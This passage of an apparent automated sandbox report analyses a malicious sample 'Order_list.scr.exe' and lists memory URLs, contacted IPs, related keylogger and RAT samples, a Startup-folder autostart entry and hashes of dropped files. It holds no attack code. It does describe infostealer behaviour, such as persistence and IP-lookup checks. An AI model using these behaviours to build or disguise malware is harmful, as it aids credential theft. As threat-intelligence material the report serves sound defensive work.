00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.urwpp.deDPleaseOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.zhongyicts.com.cnOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sakkal.comOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                                                    high
                                                                                    https://reallyfreegeoip.org/xml/Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.fontbureau.comOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://contoso.com/Iconpowershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.ver)svchost.exe, 00000004.00000002.3324839942.0000023A6F000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.ascendercorp.com/typedesigners.htmlit-ittOrder_list.scr.exe, 00000000.00000002.4175150990.0000000005A65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://checkip.dyndns.orgOrder_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003379000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027E5000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1841172457.0000000004B52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.carterandcone.comlOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.founder.com.cn/cnOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1703151617.0000023A6F2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                                                                                                                  high
                                                                                                                  http://www.jiyu-kobo.co.jp/Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$Order_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://reallyfreegeoip.orgOrder_list.scr.exe, 00000003.00000002.4141697018.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000283B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers8Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crl.microupowershell.exe, 00000006.00000002.1852338401.00000000074C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://checkip.dyndns.orgX00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          104.21.64.1
                                                                                                                          reallyfreegeoip.orgUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          132.226.247.73
                                                                                                                          checkip.dyndns.comUnited States
                                                                                                                          16989UTMEMUSfalse
                                                                                                                          IP
                                                                                                                          127.0.0.1
                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                          Analysis ID:1589903
                                                                                                                          Start date and time:2025-01-13 10:11:10 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 9m 26s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:Order_list.scr.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/3
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 50%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 253
                                                                                                                          • Number of non-executed functions: 34
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 20.3.187.198, 4.175.87.197, 13.107.246.45
                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Execution Graph export aborted for target Order_list.scr.exe, PID 3584 because it is empty
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6260 because it is empty
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                          TimeTypeDescription
                                                                                                                          04:12:02API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                                                          04:12:04API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                          04:12:05API Interceptor7587892x Sleep call for process: Order_list.scr.exe modified
                                                                                                                          04:12:19API Interceptor6571089x Sleep call for process: 00.exe modified
                                                                                                                          09:12:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          104.21.64.1gem2.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                                                                                          SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.mffnow.info/0pqe/
                                                                                                                          4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.vilakodsiy.sbs/w7eo/
                                                                                                                          1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.mzkd6gp5.top/utww/
                                                                                                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.mzkd6gp5.top/3u0p/
                                                                                                                          Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                          • ordrr.statementquo.com/QCbxA/
                                                                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                          • adsfirm.com/administrator/index.php
                                                                                                                          PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.bser101pp.buzz/v89f/
                                                                                                                          132.226.247.73JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          reallyfreegeoip.orgmnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.112.1
                                                                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.48.1
                                                                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.112.1
                                                                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          checkip.dyndns.comnfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 158.101.44.242
                                                                                                                          mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 158.101.44.242
                                                                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 193.122.130.0
                                                                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 193.122.130.0
                                                                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 132.226.8.169
                                                                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 193.122.130.0
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          UTMEMUSJWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 132.226.8.169
                                                                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 132.226.8.169
                                                                                                                          fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 132.226.8.169
                                                                                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 132.226.8.169
                                                                                                                          uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 132.226.8.169
                                                                                                                          CLOUDFLARENETUSinvnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 172.67.74.152
                                                                                                                          g6.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          http://communication.investecprivatebank.co.za/Marketing/DocFusion/Headers/PBHeaderBanner.jpgGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.96.1
                                                                                                                          CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          g3.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          1001-13.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          https://file2-cdn.creality.com/file/2e068bd90e233501c8036fb25c76e092/CrealityScan_win_3.3.4-20241030.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.159.61.3
                                                                                                                          g4.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adReceipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          Loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          No context
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8192
                                                                                                                          Entropy (8bit):0.363788168458258
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                          MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                          SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                          SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                          SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):1.3107641597418067
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrh:KooCEYhgYEL0In
                                                                                                                          MD5:51CDBACD3BCB25B6BDBC9FF440DB5957
                                                                                                                          SHA1:FAC93578F86DFB3185A64F28F791C37AB158D956
                                                                                                                          SHA-256:648C46777F9A118EAAE868C2B3BAD7B45A33A2FAE39732CBDE4E129FA28316B1
                                                                                                                          SHA-512:BF91228E9E932D073E8E5B4F0FFCDB8D00A5563ED8E0CE2D37EEB855CD34F8EC49181FCD0AF95D4A4AD28D2634725EC4B22ED01C2E3507A93D833F3F8A3DC20E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe8f6cbbb, page size 16384, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.42215424521884115
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:/SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:/azag03A2UrzJDO
                                                                                                                          MD5:8766168C36197809C87E59FD844DDEDF
                                                                                                                          SHA1:80CE8136C8830C98750C3326AA94722A43936C30
                                                                                                                          SHA-256:548057DAC7345E74A0A1728308C371258C9F91354681C0B5FE486221A26B95B9
                                                                                                                          SHA-512:C9B4B57FCC2FC1F580E5706E9DD1C02AD8EA52DC3F1D645D5EC03673EB31F2430EF6AEEE06F8FFE8F324D70DB63D6153CEACAB333497BAEB281B8959C4FE8595
                                                                                                                          Malicious:false
                                                                                                                          Preview:...... .......Y.......X\...;...{......................n.%..........}m......}..h.#..........}m.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{.....................................@.....}m..........................}m..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.07829208661062691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:JmtOetYeW1qqljlt/ajq4RIjK7qJRIlNljlt/ollOE/tlnl+/rTc:YtrzAp5Xgq7K7dXApMP
                                                                                                                          MD5:F0134AA702F3C31A71C0D390713F56A2
                                                                                                                          SHA1:39E815C7B46FE3134F1AE01CE12A45D6CF2AE2DF
                                                                                                                          SHA-256:CA5312F6543E1CCF410D61C0DA5E057A4F00AAAFC9FC01BD12DDE84D5E325D9B
                                                                                                                          SHA-512:ED7DF2F8E44008DBF8A20755D60F54A1CBCF4D2931B1F2BAB0A2E86F4E944B8ED533EB1A3EDDE66CC19B10F87CFD8293765E77CC364765A96F6D2DC818793F88
                                                                                                                          Malicious:false
                                                                                                                          Preview:...r.....................................;...{.......}.......}m..............}m......}m..........}O..........................}m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1248
                                                                                                                          Entropy (8bit):5.370777891441471
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3vQWWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R8UHrx:YWWSU4y4RQmFoUeWmfmZ9tlNWR8Wt
                                                                                                                          MD5:93C80849E27DDE20CCB9753F5E77CFEF
                                                                                                                          SHA1:D804D9BDD6F298E64F1CF6FD9CB6B4B47BB93C48
                                                                                                                          SHA-256:A0DD3BB5A627248AC2FCBF8BB234C769E5D33230B92DE9FCD1AB6E39AE4815F1
